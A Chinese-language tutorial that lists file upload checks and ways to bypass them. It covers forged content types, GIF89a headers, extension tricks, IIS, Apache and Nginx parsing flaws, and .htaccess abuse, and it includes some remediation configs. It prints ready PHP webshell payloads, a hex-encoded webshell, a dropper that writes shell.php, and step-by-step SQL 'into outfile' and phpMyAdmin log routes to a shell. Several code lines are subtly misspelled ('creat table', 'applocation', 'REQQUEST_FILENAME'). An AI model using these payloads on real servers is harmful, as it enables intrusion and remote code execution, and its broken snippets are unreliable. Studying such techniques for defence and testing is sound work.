文件上传漏洞

文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片，文本或者其他资源到指定的位置，文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中，再通过url去访问以执行代码。

0x01文件上传校验姿势

（1）客户端javascript校验（一般只校验后缀名）
（2）服务端校验
文件头content-type字段校验（image/gif）
文件内容头校验（GIF89a）
后缀名黑名单校验
后缀名白名单校验
自定义正则校验
（3）WAF设备校验（根据不同的WAF产品而定

客户端校验

一般都是在网页上写一段javascript脚本，校验上传文件的后缀名，有白名单形式也有黑名单形式。
判断方式：在浏览加载文件，但还未点击上传按钮时便弹出对话框，内容如：只允许上传.jpg/.jpeg/.png后缀名的文件，而此时并没有发送数据包。

服务端校验

content-type字段校验

这里以PHP代码为例，模拟web服务器端的校验代码

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

<?php if($_FILES['userfile']['type'] != "image/gif") #这里对上传的文件类型进行判断，如果不是image/gif类型便返回错误。 { echo "Sorry, we only allow uploading GIF images"; exit; } $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded. "; } else { echo "File uploading failed. "; } ?>

可以看到代码对上传文件的文件类型进行了判断，如果不是图片类型，返回错误。

文件头校验

可以通过自己写正则匹配，判断文件头内容是否符合要求，这里举几个常见的文件头对应关系：
（1） .JPEG;.JPE;.JPG，”JPGGraphic File”
（2） .gif，”GIF 89A”
（3） .zip，”Zip Compressed”
（4） .doc;.xls;.xlt;.ppt;.apr，”MS Compound Document v1 or Lotus Approach APRfile”

0x02文件上传绕过校验姿势

（1）客户端绕过（抓包改包）
（2）服务端绕过
文件类型
文件头
文件后缀名
（3）配合文件包含漏洞绕过
（4）配合服务器解析漏洞绕过
（4）CMS、编辑器漏洞绕过
（5）配合操作系统文件命名规则绕过
（6）配合其他规则绕过
（7）WAF绕过

客户端绕过

可以利用burp抓包改包，先上传一个gif类型的木马，然后通过burp将其改为asp/php/jsp后缀名即可。

服务端绕过

文件类型绕过

我们可以通过抓包，将content-type字段改为image/gif

1 2 3 4 5 6 7 8 9 10

POST /upload.php HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: localhost User-Agent: libwww-perl/5.803 Content-Type: multipart/form-data; boundary=xYzZY Content-Length: 155 --xYzZY Content-Disposition: form-data; name="userfile"; filename="shell.php" Content-Type: image/gif (原为 Content-Type: text/plain)

文件头绕过

在木马内容基础上再加了一些文件信息，有点像下面的结构

1	GIF89a<?php phpinfo(); ?>

文件后缀名绕过

前提：黑名单校验
黑名单检测：一般有个专门的 blacklist 文件，里面会包含常见的危险脚本文件。
绕过方法：
（1）找黑名单扩展名的漏网之鱼 - 比如 asa 和 cer 之类
（2）可能存在大小写绕过漏洞 - 比如 aSp 和 pHp 之类
能被解析的文件扩展名列表：
jsp jspx jspf
asp asa cer aspx
php php php3 php4
exe exee

配合文件包含漏洞

前提：校验规则只校验当文件后缀名为asp/php/jsp的文件内容是否为木马。
绕过方式：（这里拿php为例，此漏洞主要存在于PHP中）
（1）先上传一个内容为木马的txt后缀文件，因为后缀名的关系没有检验内容；
（2）然后再上传一个.php的文件，内容为
此时，这个php文件就会去引用txt文件的内容，从而绕过校验，下面列举包含的语法：

1 2 3 4 5 6 7 8

#PHP <?php Include("上传的txt文件路径");?> #ASP <!--#include file="上传的txt文件路径" --> #JSP <jsp:inclde page="上传的txt文件路径"/> or <%@include file="上传的txt文件路径"%>

配合服务器解析漏洞

IIS5.X-6.X解析漏洞

使用iis5.x-6.x版本的服务器，大多为windows server 2003，网站比较古老，开发语句一般为asp；该解析漏洞也只能解析asp文件，而不能解析aspx文件。
目录解析(6.0)
形式：http://www.xxx.com/xx.asp/xx.jpg
原理: 服务器默认会把.asp，.asa目录下的文件都解析成asp文件。
文件解析
形式：http://www.xxx.com/xx.asp;.jpg
原理：服务器默认不解析;号后面的内容，因此xx.asp;.jpg便被解析成asp文件了。
解析文件类型
IIS6.0 默认的可执行文件除了asp还包含这三种 :
/test.asa
/test.cer
/test.cdx

修复方案

1.目前尚无微软官方的补丁，可以通过自己编写正则，阻止上传xx.asp;.jpg类型的文件名。
2.做好权限设置，限制用户创建文件夹。

APACHE解析漏洞

漏洞原理
　　Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。
漏洞形式
http://www.xxxx.xxx.com/test.php.php123

其余配置问题导致漏洞

（1）如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
（2）如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg，一样能以 php 方式执行。
（3）Apache解析漏洞（CVE-2017-15715）绕过上传黑名单
我们利用CVE-2017-15715，上传一个包含换行符的文件。注意，只能是x0A，不能是x0Dx0A，所以我们用hex功能在1.php后面添加一个x0A：

然后访问/1.php%0A，即可发现已经成功getshell：

修复方案

（1）apache配置文件，禁止.php.这样的文件执行，配置文件里面加入

1 2 3 4

<Files ~ “.(php.|php3.)”> Order Allow,Deny Deny from all </Files>

（2）用伪静态能解决这个问题，重写类似.php.*这类文件，打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so
把#号去掉，重启apache,在网站根目录下建立.htaccess文件,代码如下:

1 2 3 4 5 6 7 8 9 10 11

<IfModule mod_rewrite.c> RewriteEngine On RewriteRule .(php.|php3.) /index.php RewriteRule .(pHp.|pHp3.) /index.php RewriteRule .(phP.|phP3.) /index.php RewriteRule .(Php.|Php3.) /index.php RewriteRule .(PHp.|PHp3.) /index.php RewriteRule .(PhP.|PhP3.) /index.php RewriteRule .(pHP.|pHP3.) /index.php RewriteRule .(PHP.|PHP3.) /index.php </IfModule>

NGINX<8.03解析漏洞

Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问http://www.xx.com/phpinfo.jpg/1.php这个URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成SCRIPT_FILENAME传递给PHP CGI，但是PHP为什么会接受这样的参数，并将phpinfo.jpg作为PHP文件解析呢?这就要说到fix_pathinfo这个选项了。 如果开启了这个选项，那么就会触发在PHP中的如下逻辑：
PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会将phpinfo.jpg作为PHP文件来解析了
漏洞形式
http://www.xxxx.com/UploadFiles/image/1.jpg/1.php
http://www.xxxx.com/UploadFiles/image/1.jpg%00.php
http://www.xxxx.com/UploadFiles/image/1.jpg/%20.php

另外一种手法

上传一个名字为test.jpg，以下内容的文件。

1	<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。

修复方案

（1）修改php.ini文件，将cgi.fix_pathinfo的值设置为0;
（2）在Nginx配置文件中添加以下代码：

1 2 3

if ( $fastcgi_script_name ~ ..*/.*php ) { 　　return 403; 　　}

这行代码的意思是当匹配到类似test.jpg/a.php的URL时，将返回403错误代码。

IIS7.5解析漏洞

IIS7.5的漏洞与nginx的类似，都是由于php配置文件中，开启了cgi.fix_pathinfo，而这并不是nginx或者iis7.5本身的漏洞。

配合操作系统文件命令规则

上传不符合WINDOWS文件命名规则的文件名

test.asp.
test.asp(空格)
test.php:1.jpg之后传输数据流test.<< 
test.php::$DATA
shell.php::$DATA…….
会被windows系统自动去掉不符合规则符号后面的内容。

LINUX下后缀名大小写

在linux下，如果上传php不被解析，可以试试上传pHp后缀的文件名。

CMS、编辑器漏洞

（1）CMS漏洞：比如说JCMS等存在的漏洞，可以针对不同CMS存在的上传漏洞进行绕过。
（2）编辑器漏洞：比如FCK，ewebeditor等，可以针对编辑器的漏洞进行绕过。

后台管理数据备份拿Shell

第一步：上传一句话，记录文件地址
第二步：备份数据库，将地址换成木马上传的地址，备份
第三步：重命名，将图片格式的换成php，asp，jsp格式的
第四步：如果备份数据库路径不能改的话
解决办法：（1）抓包工具修改地址
（2）在前端HTML里面改
第五步：在设置页面插入，注意语句的闭合

phpmyadmin

第一步：获取网站的绝对路径
报错显示路径
phpinfo()显示
第二步：找记录日志的文件，开启记录日志

第三步：修改日志存放的路径（网站的绝对路径）

第四步：将php一句话木马写入日志

1	select "<?php eval($_POST['pass']);?>"

SQL语句创建表写入一句话

第一步:创建表，表里建一个列

1	creat table `mysql`.`biao`(`biao2` text not null);

第二步:将一句话插入到表中

1	insert into `mysql`.`biao`(`biao2`)values('<?php @eval($_POST['pass']);?>')

第四步:将表导出,知道网站的绝对路径

1	select biao2 from biao into outfile '网站绝对路径';

SQL语句写入一句话

写入文件一句话（网站绝对路径）

1	select '<?php @eval($_POST[x]);?>' into outfile '网站绝对路径1.php';

有时用16进制写入

1	select 0x3c3f70687020406576616c28245f504f53545b2770617373275d293b3f3e,2 into outfile '网站绝对路径1.php'

读取文件

1	select load_file('文件地址')

配合其他规则

（1）0x00截断（php 版本<5.3.4）：基于一个组合逻辑漏洞造成的，通常存在于构造上传文件路径的时候
　　test.php(0x00).jpg
　　test.php%00.jpg

（2）JPG文件解析
上传一个.htaccess文件：这样整个文件夹里的jpg文件全部解析为php文件

1 2 3 4 5 6 7 8

<IfModule mode_rewrite.c> AddType applocation/x-httpd-php .jpg Options +FollowSymlinks -Multiviews RewriteEngine on RewriteCond %{REQQUEST_FILENAME} !-d RewriteCond %{REQQUEST_FILENAME} !-f RewriteRule ^(.*)$ index.php/$1 [QSA,PT,L] </IfModule>